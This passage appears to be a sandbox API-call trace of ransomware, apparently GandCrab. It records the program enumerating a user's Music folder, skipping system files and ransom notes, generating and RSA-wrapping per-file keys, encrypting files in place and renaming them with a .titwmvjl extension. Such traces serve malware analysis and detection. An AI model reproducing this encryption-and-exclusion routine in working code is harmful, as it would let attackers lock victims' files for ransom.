dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0092.828] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.832] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.832] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.832] CloseHandle (hObject=0x2b4) returned 1 [0092.833] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\9psjfy-f pszjx.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\9PsjFY-F PSzjx.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\9psjfy-f pszjx.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0092.834] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.834] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.834] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0092.834] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0092.834] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock" [0092.834] lstrlenW (lpString=".titwmvjl") returned 9 [0092.834] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock") returned 66 [0092.834] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.834] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 75 [0092.834] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\d2ca4a09d2ca4deb61a.lock") returned 66 [0092.834] lstrlenW (lpString=".lock") returned 5 [0092.834] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.834] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0092.834] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.835] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.835] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.835] lstrcmpW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2=".") returned 1 [0092.835] lstrcmpW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="..") returned 1 [0092.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="Eb1Q7fUwCA2DHE.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a" [0092.835] lstrlenW (lpString=".titwmvjl") returned 9 [0092.835] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a") returned 60 [0092.835] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.835] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a.titwmvjl") returned 69 [0092.835] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a") returned 60 [0092.835] lstrlenW (lpString=".m4a") returned 4 [0092.835] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.835] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0092.835] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0092.836] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.836] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a") returned 60 [0092.836] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a") returned 60 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="desktop.ini") returned 1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="autorun.inf") returned 1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="ntuser.dat") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="iconcache.db") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="bootsect.bak") returned 1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="boot.ini") returned 1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="ntuser.dat.log") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="thumbs.db") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="ntldr") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="NTDETECT.COM") returned -1 [0092.836] lstrcmpiW (lpString1="Eb1Q7fUwCA2DHE.m4a", lpString2="Bootfont.bin") returned 1 [0092.836] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a") returned 60 [0092.836] lstrlenW (lpString=".m4a") returned 4 [0092.836] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.836] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0092.836] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.837] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.837] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\eb1q7fuwca2dhe.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.837] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.837] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.838] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.838] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.838] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.839] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.839] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.839] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.839] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.839] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.839] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.840] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.840] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.840] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.841] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.841] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.841] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.841] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.841] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.842] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0092.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.842] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.842] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.842] GetLastError () returned 0x0 [0092.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.842] CryptDestroyKey (hKey=0x5034f8) returned 1 [0092.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.843] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.843] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.843] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033b8) returned 1 [0092.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.843] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.844] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.844] GetLastError () returned 0x0 [0092.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.844] CryptDestroyKey (hKey=0x5033b8) returned 1 [0092.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.844] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.844] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.845] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.845] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xf08a, lpOverlapped=0x0) returned 1 [0092.857] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff0f76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.858] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf08a, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xf08a, lpOverlapped=0x0) returned 1 [0092.859] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0092.860] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.864] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.865] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.865] CloseHandle (hObject=0x2b4) returned 1 [0092.868] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\eb1q7fuwca2dhe.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\Eb1Q7fUwCA2DHE.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\eb1q7fuwca2dhe.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0092.869] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.870] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.870] lstrcmpW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2=".") returned 1 [0092.870] lstrcmpW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="..") returned 1 [0092.870] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="fPu5rMcj8Fp4K1.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3" [0092.870] lstrlenW (lpString=".titwmvjl") returned 9 [0092.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3") returned 60 [0092.870] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.870] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3.titwmvjl") returned 69 [0092.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3") returned 60 [0092.870] lstrlenW (lpString=".mp3") returned 4 [0092.870] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.870] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0092.870] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0092.870] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3") returned 60 [0092.871] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3") returned 60 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="desktop.ini") returned 1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="autorun.inf") returned 1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="ntuser.dat") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="iconcache.db") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="bootsect.bak") returned 1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="boot.ini") returned 1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="ntuser.dat.log") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="thumbs.db") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="ntldr") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="NTDETECT.COM") returned -1 [0092.871] lstrcmpiW (lpString1="fPu5rMcj8Fp4K1.mp3", lpString2="Bootfont.bin") returned 1 [0092.871] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3") returned 60 [0092.871] lstrlenW (lpString=".mp3") returned 4 [0092.871] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.871] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0092.872] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.872] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.872] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\fPu5rMcj8Fp4K1.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\fpu5rmcj8fp4k1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.872] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.872] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.873] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.874] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.874] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.874] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.875] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.875] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.875] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.875] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.875] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.876] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.876] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.876] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.876] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.877] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.877] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.877] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.878] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0092.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.878] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.878] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.879] GetLastError () returned 0x0 [0092.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.879] CryptDestroyKey (hKey=0x5038f8) returned 1 [0092.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.879] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.879] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.880] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0092.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.880] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.880] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.881] GetLastError () returned 0x0 [0092.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.881] CryptDestroyKey (hKey=0x503578) returned 1 [0092.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.881] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.881] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.882] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.882] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x3a1e, lpOverlapped=0x0) returned 1 [0092.896] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffc5e2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3a1e, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: 